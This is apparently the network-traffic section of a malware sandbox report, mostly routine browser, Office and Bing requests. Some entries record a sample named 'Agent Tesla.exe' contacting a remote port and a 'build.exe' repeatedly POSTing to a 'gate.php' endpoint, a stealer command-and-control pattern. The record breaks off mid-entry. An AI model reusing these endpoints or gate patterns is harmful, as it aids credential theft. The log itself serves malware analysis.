https://www.google.com/sorry/index?continue=https://syndicatedsearch.goog/afs/ads%3Fadtest%3Doff%26psid%3D3113057640%26pcsa%3Dfalse%26channel%3Dpid-bodis-gcontrol97%252Cpid-bodis-gcontrol109%252Cpid-bodis-gcontrol439%252Cpid-bodis-gcontrol151%252Cpid-bodis-gcontrol160%26client%3Ddp-bodis31_3ph%26r%3Dm%26hl%3Den%26ivt%3D0%26rpbu%3Dhttp%253A%252F%252Fww7.ardamax.com%252F%253Fcaf%253D1%2526bpt%253D345%2526usid%253D19%2526utid%253D19445573727%26max_radlink_len%3D50%26type%3D3%26uiopt%3Dfalse%26swp%3Das-drid-2348603269777440%26oe%3DUTF-8%26ie%3DUTF-8%26fexp%3D21404%252C17300003%252C17301431%252C17301433%252C17301436%252C17301542%252C17301266%252C72717107%252C49280903%252C72771953%26format%3Dr3%26nocache%3D991733306390744%26num%3D0%26output%3Dafd_ads%26domain_name%3Dww7.ardamax.com%26v%3D3%26bsl%3D8%26pac%3D0%26u_his%3D1%26u_tz%3D0%26dt%3D1733306390745%26u_w%3D1280%26u_h%3D720%26biw%3D1280%26bih%3D601%26psw%3D1280%26psh%3D541%26frm%3D0%26uio%3D-%26cont%3Drs%26drt%3D0%26jsid%3Dcaf%26jsv%3D697661440%26rurl%3Dhttp%253A%252F%252Fww7.ardamax.com%252Fkeylogger%252F%253Fusid%253D19%2526utid%253D19445573727&hl=en&q=EgS117BTGJ_QwLoGIjCQogCwm8eRv7vM6sfOAPkPEsk_hAG_wkhAznNxRj5MPzUpHgEdIZ8NF8YcyjICh7kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

tls, http2

msedge.exe

4.4kB
71.8kB
47
65

HTTP Request

GET https://www.google.com/adsense/domains/caf.js?abp=1&bodis=true

HTTP Request

GET https://www.google.com/sorry/index?continue=https://syndicatedsearch.goog/afs/ads%3Fadtest%3Doff%26psid%3D3113057640%26pcsa%3Dfalse%26channel%3Dpid-bodis-gcontrol97%252Cpid-bodis-gcontrol109%252Cpid-bodis-gcontrol439%252Cpid-bodis-gcontrol151%252Cpid-bodis-gcontrol160%26client%3Ddp-bodis31_3ph%26r%3Dm%26hl%3Den%26ivt%3D0%26rpbu%3Dhttp%253A%252F%252Fww7.ardamax.com%252F%253Fcaf%253D1%2526bpt%253D345%2526usid%253D19%2526utid%253D19445573727%26max_radlink_len%3D50%26type%3D3%26uiopt%3Dfalse%26swp%3Das-drid-2348603269777440%26oe%3DUTF-8%26ie%3DUTF-8%26fexp%3D21404%252C17300003%252C17301431%252C17301433%252C17301436%252C17301542%252C17301266%252C72717107%252C49280903%252C72771953%26format%3Dr3%26nocache%3D991733306390744%26num%3D0%26output%3Dafd_ads%26domain_name%3Dww7.ardamax.com%26v%3D3%26bsl%3D8%26pac%3D0%26u_his%3D1%26u_tz%3D0%26dt%3D1733306390745%26u_w%3D1280%26u_h%3D720%26biw%3D1280%26bih%3D601%26psw%3D1280%26psh%3D541%26frm%3D0%26uio%3D-%26cont%3Drs%26drt%3D0%26jsid%3Dcaf%26jsv%3D697661440%26rurl%3Dhttp%253A%252F%252Fww7.ardamax.com%252Fkeylogger%252F%253Fusid%253D19%2526utid%253D19445573727&hl=en&q=EgS117BTGJ_QwLoGIjCQogCwm8eRv7vM6sfOAPkPEsk_hAG_wkhAznNxRj5MPzUpHgEdIZ8NF8YcyjICh7kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
216.58.201.110:443

https://syndicatedsearch.goog/afs/ads?adtest=off&psid=3113057640&pcsa=false&channel=pid-bodis-gcontrol97%2Cpid-bodis-gcontrol109%2Cpid-bodis-gcontrol439%2Cpid-bodis-gcontrol151%2Cpid-bodis-gcontrol160&client=dp-bodis31_3ph&r=m&hl=en&ivt=0&rpbu=http%3A%2F%2Fww7.ardamax.com%2F%3Fcaf%3D1%26bpt%3D345%26usid%3D19%26utid%3D19445573727&max_radlink_len=50&type=3&uiopt=false&swp=as-drid-2348603269777440&oe=UTF-8&ie=UTF-8&fexp=21404%2C17300003%2C17301431%2C17301433%2C17301436%2C17301542%2C17301266%2C72717107%2C49280903%2C72771953&format=r3&nocache=991733306390744&num=0&output=afd_ads&domain_name=ww7.ardamax.com&v=3&bsl=8&pac=0&u_his=1&u_tz=0&dt=1733306390745&u_w=1280&u_h=720&biw=1280&bih=601&psw=1280&psh=541&frm=0&uio=-&cont=rs&drt=0&jsid=caf&jsv=697661440&rurl=http%3A%2F%2Fww7.ardamax.com%2Fkeylogger%2F%3Fusid%3D19%26utid%3D19445573727

tls, http2

msedge.exe

2.5kB
8.5kB
15
17

HTTP Request

GET https://syndicatedsearch.goog/afs/ads?adtest=off&psid=3113057640&pcsa=false&channel=pid-bodis-gcontrol97%2Cpid-bodis-gcontrol109%2Cpid-bodis-gcontrol439%2Cpid-bodis-gcontrol151%2Cpid-bodis-gcontrol160&client=dp-bodis31_3ph&r=m&hl=en&ivt=0&rpbu=http%3A%2F%2Fww7.ardamax.com%2F%3Fcaf%3D1%26bpt%3D345%26usid%3D19%26utid%3D19445573727&max_radlink_len=50&type=3&uiopt=false&swp=as-drid-2348603269777440&oe=UTF-8&ie=UTF-8&fexp=21404%2C17300003%2C17301431%2C17301433%2C17301436%2C17301542%2C17301266%2C72717107%2C49280903%2C72771953&format=r3&nocache=991733306390744&num=0&output=afd_ads&domain_name=ww7.ardamax.com&v=3&bsl=8&pac=0&u_his=1&u_tz=0&dt=1733306390745&u_w=1280&u_h=720&biw=1280&bih=601&psw=1280&psh=541&frm=0&uio=-&cont=rs&drt=0&jsid=caf&jsv=697661440&rurl=http%3A%2F%2Fww7.ardamax.com%2Fkeylogger%2F%3Fusid%3D19%26utid%3D19445573727
142.250.179.226:443

https://partner.googleadservices.com/gampad/cookie.js?domain=ww7.ardamax.com&client=partner-dp-bodis31_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2

tls, http2

msedge.exe

1.9kB
6.3kB
15
16

HTTP Request

GET https://partner.googleadservices.com/gampad/cookie.js?domain=ww7.ardamax.com&client=partner-dp-bodis31_3ph&product=SAS&callback=__sasCookie&cookie_types=v1%2Cv2
199.59.243.227:80

http://ww7.ardamax.com/_fd?usid=19&utid=19445573727

http

msedge.exe

3.1kB
47.0kB
27
40

HTTP Request

GET http://ww7.ardamax.com/keylogger/?usid=19&utid=19445573727

HTTP Response

200

HTTP Request

GET http://ww7.ardamax.com/bqEuqGUlw.js

HTTP Response

200

HTTP Request

POST http://ww7.ardamax.com/_fd?usid=19&utid=19445573727

HTTP Response

200
199.59.243.227:80

ww7.ardamax.com

msedge.exe

190 B
92 B
4
2
51.140.244.186:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

7.2kB
10.0kB
20
15

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
51.140.244.186:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

3.0kB
8.1kB
12
11

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
154.197.79.12:443

www.agenttesla.com

msedge.exe

260 B
200 B
5
5
185.22.187.29:3345

Agent Tesla.exe

260 B
5
52.109.76.243:443

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

tls, http

Winword.exe

2.0kB
8.2kB
13
11

HTTP Request

POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

HTTP Response

200
92.123.26.217:443

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

tls, http

Winword.exe

1.2kB
5.9kB
8
9

HTTP Request

GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

tls, http

Winword.exe

2.4kB
52.8kB
34
42

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

tls, http

Winword.exe

14.0kB
281.5kB
196
208

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

tls, http

Winword.exe

1.9kB
39.2kB
24
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

tls, http

Winword.exe

35.1kB
1.4MB
657
1012

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

tls, http

Winword.exe

28.3kB
760.8kB
434
551

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

tls, http

Winword.exe

60.4kB
1.9MB
1037
1338

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

tls, http

Winword.exe

2.6kB
38.8kB
32
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

tls, http

Winword.exe

42.8kB
1.1MB
697
819

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

tls, http

Winword.exe

2.2kB
40.2kB
29
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

tls, http

Winword.exe

2.3kB
40.3kB
30
34

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

tls, http

Winword.exe

2.5kB
38.3kB
32
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

tls, http

Winword.exe

69.5kB
2.6MB
1262
1901

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

tls, http

Winword.exe

11.8kB
311.8kB
196
228

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

tls, http

Winword.exe

34.2kB
751.4kB
521
544

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

tls, http

Winword.exe

2.0kB
27.5kB
24
23

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

tls, http

Winword.exe

1.9kB
34.8kB
23
29

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

tls, http

Winword.exe

3.5kB
72.5kB
44
56

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

tls, http

Winword.exe

2.2kB
32.8kB
28
28

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

tls, http

Winword.exe

2.3kB
37.4kB
28
31

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

tls, http

Winword.exe

1.7kB
25.8kB
19
22

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

tls, http

Winword.exe

12.0kB
322.1kB
207
235

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

tls, http

Winword.exe

1.8kB
26.9kB
21
24

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

tls, http

Winword.exe

2.1kB
39.8kB
27
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

tls, http

Winword.exe

83.3kB
3.4MB
1561
2452

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

tls, http

Winword.exe

2.1kB
29.3kB
25
24

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

tls, http

Winword.exe

88.6kB
3.6MB
1634
2572

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

tls, http

Winword.exe

33.3kB
1.0MB
544
732

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

tls, http

Winword.exe

2.1kB
29.7kB
26
26

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

tls, http

Winword.exe

53.5kB
2.0MB
969
1416

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

tls, http

Winword.exe

33.8kB
1.2MB
569
837

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

tls, http

Winword.exe

2.0kB
28.0kB
21
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

tls, http

Winword.exe

2.0kB
31.2kB
22
27

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

tls, http

Winword.exe

10.4kB
310.2kB
179
227

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

tls, http

Winword.exe

8.1kB
293.6kB
140
215

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

tls, http

Winword.exe

9.0kB
286.0kB
160
209

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

tls, http

Winword.exe

62.8kB
2.7MB
1188
1927

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

tls, http

Winword.exe

14.7kB
574.9kB
262
417

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

tls, http

Winword.exe

14.4kB
666.3kB
280
481

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

HTTP Response

200
23.73.137.235:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

tls, http

Winword.exe

5.5kB
235.1kB
101
173

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

HTTP Response

200
154.197.79.12:443

www.agenttesla.com

msedge.exe

156 B
120 B
3
3
51.11.108.188:443

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

tls, http

msedge.exe

2.5kB
7.4kB
11
11

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200
51.11.108.188:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

3.0kB
8.1kB
12
11

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
154.197.79.12:443

www.agenttesla.com

msedge.exe

156 B
120 B
3
3
199.59.243.227:80

http://www.ethicalhackingtutorials.com/_fd

http

msedge.exe

2.7kB
47.1kB
28
41

HTTP Request

GET http://www.ethicalhackingtutorials.com/

HTTP Response

200

HTTP Request

GET http://www.ethicalhackingtutorials.com/bRXcLdFfr.js

HTTP Response

200

HTTP Request

POST http://www.ethicalhackingtutorials.com/_fd

HTTP Response

200
199.59.243.227:80

ww7.ardamax.com

http

msedge.exe

328 B
445 B
7
5

HTTP Response

408
51.11.108.188:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

3.0kB
8.1kB
12
11

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
51.11.108.188:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

5.7kB
10.5kB
16
15

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
172.217.16.228:443

www.google.com

tls, http2

msedge.exe

989 B
5.1kB
9
9
104.21.31.241:80

http://host.com/gate.php

http

build.exe

853 B
1.6kB
6
6

HTTP Request

POST http://host.com/gate.php

HTTP Response

404
104.21.31.241:80

http://host.com/gate.php

http

build.exe

3.5kB
1.7kB
8
8

HTTP Request

POST http://host.com/gate.php

HTTP Response

404
104.21.31.241:80

http://host.com/gate.php

http

build.exe

853 B
1.6kB
6
6

HTTP Request

POST http://host.com/gate.php

HTTP Response

404
104.21.31.241:80

http://host.com/gate.php

http

build.exe

3.5kB
1.7kB
8
8

HTTP Request

POST http://host.com/gate.php

HTTP Response

404
172.165.61.93:443

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

tls, http

msedge.exe

3.1kB
10.2kB
14
13

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200
172.165.61.93:443

https://nav.smartscreen.microsoft.com/api/browser/edge/downloadcomplete/1

tls, http

msedge.exe

28.8kB
18.5kB
46
30

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/actions

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

HTTP Response

200

HTTP Request

POST https://nav.smartscreen.microsoft.com/api/browser/edge/downloadcomplete/1

HTTP Response

200
95.101.143.203:443

https://www.bing.com/fd/ls/lsp.aspx

tls, http2

msedge.exe

314.0kB
1.5MB
1366
1826

HTTP Request

GET https://www.bing.com/qbox?query=o&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=1a8b0213cc574135b5fb05c83f2ee1a6&oit=1&cp=1&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=5f96492435374cfa983fd7f3162ee7fb&oit=1&cp=2&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onh&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=6374bb6913c44f1987e70ed22a8e0b3a&oit=1&cp=3&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=b5deb4cb600840459c8628729032f274&oit=1&cp=2&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onj&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=4375ce3d9bf04af699c7cc83a749fa53&oit=1&cp=3&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onjo&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=7ca0e933740443c39aca440395ac5012&oit=1&cp=4&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=onjon&language=en-US&pt=EdgBox&cvid=0e0e04224c204a07ae85e85e161201dd&ig=ec57e656d6064151b3682ac9ac4f3296&oit=1&cp=5&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png

HTTP Response

200

HTTP Request

GET https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.329134,4.234374/10?ms=622,150&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=2&shading=hill&logo=n&da=ro&pp=48.324177,4.305159;htp.ms&pp=48.363056,4.332778;htp.ms&pp=48.295212,4.13597;htp.ms&pp=48.324177,4.305159;htp.ms&pp=48.328407,4.115885;htp.ms&pp=48.421005,4.479508;htp.ms&pp=48.331009,4.099303;dfp.ms&pp=48.457363,4.123089;dfp.ms&pp=48.421616,4.480013;dfp.ms

HTTP Request

GET https://www.bing.com/maps/geoplat/REST/v1/Imagery/Map/RoadVibrant/48.395556,4.281667/10?ms=432,128&ml=Basemap,LandCover,Landmarks,OsmBuildings&key=AnTcaqBi2ypp0xI-OZNi4W_ik2KhjgpqioTAtXLC8GzkMBQRMlyxvxyTnd5b73im&c=en-US&fmt=jpeg&od=1&shading=hill&logo=n&da=ro&pp=48.395556,4.281667;S593|SelectedPointState

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:20,%22BC%22:318,%22SE%22:-1,%22TC%22:-1,%22H%22:508,%22BP%22:711,%22CT%22:731,%22IL%22:26},%22ad%22:[-1,-1,1263,601,1263,3772,1],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/sa/simg/favicon-trans-bg-blue-mg.ico

HTTP Request

GET https://www.bing.com/rp/5A_wVM0BDlqDmkBnZeuIpN6wkcA.br.js

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/rewardsapp/widgetassets/prod/medallion/1.1.2/js/widget.js?t=241204

HTTP Request

GET https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png

HTTP Request

GET https://www.bing.com/local/hotelads?q=onjon&inDate=01/19/2025&outDate=01/20/2025&entityid=YN2000x1190976147452155201,YN1545x256073263,YN2000x6096471577638952817,YN2000x1190976147452155201,YN1544x243384812,YN2000x9391523170225958935,YN2000x4457774376323358039,YN2000x10959879645415552720,YN2000x11722354772439687545&IID=5672&source=serpls&usrd=false&frt=json&form=ANAB01&pc=U531&originig=5AD7030C91584719B4F5E41231459495&IG=5AD7030C91584719B4F5E41231459495

HTTP Request

POST https://www.bing.com/travelhotelrentalpackages/api/v1/hotel/providerpricelist?IG=5AD7030C91584719B4F5E41231459495&IID=5672

HTTP Request

GET https://www.bing.com/geolocation/write?isDevLoc=false&lat=51.519901275634766&lon=-0.10880059748888016&dispName=London%252C%2520Greater%2520London&isEff=1&effLocType=1&clientsid=undefined

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

